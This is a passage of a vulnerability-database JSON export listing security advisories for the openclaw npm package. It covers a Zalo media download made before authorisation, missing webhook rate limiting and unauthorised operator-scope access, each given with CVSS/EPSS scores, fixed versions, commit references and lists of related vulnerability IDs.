reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41394","reference_id":"","reference_type":"","scores":[{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.26999","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27037","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27045","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41394"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41394","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41394"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes"},{"reference_url":"https://github.com/advisories/GHSA-mhgq-xpfq-6r66","reference_id":"GHSA-mhgq-xpfq-6r66","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mhgq-xpfq-6r66"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41394","GHSA-mhgq-xpfq-6r66"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4hz5-f2pw-3yb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90990?format=json","vulnerability_id":"VCID-4jwj-6s5z-wbeq","summary":"OpenClaw: Zalo channel downloads media before sender authorization\n## Summary\n\nThe Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran.\n\n## Impact\n\nUnauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected.\n\n## Affected Component\n\n`extensions/zalo/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33576","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04589","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04575","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.0499","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33576"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33576","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33576"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel"},{"reference_url":"https://github.com/advisories/GHSA-v2v2-f783-358j","reference_id":"GHSA-v2v2-f783-358j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v2v2-f783-358j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33576","GHSA-v2v2-f783-358j"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4jwj-6s5z-wbeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91654?format=json","vulnerability_id":"VCID-4nwq-14y4-xkhp","summary":"OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing\n## Summary\n\nBlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`.\n\n## Fix Commit(s)\n\n- `5e08ce36d522a1c96df2bfe88e39303ae2643d92`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35623","reference_id":"","reference_type":"","scores":[{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28542","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28579","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.2862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35623"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35623","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35623"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A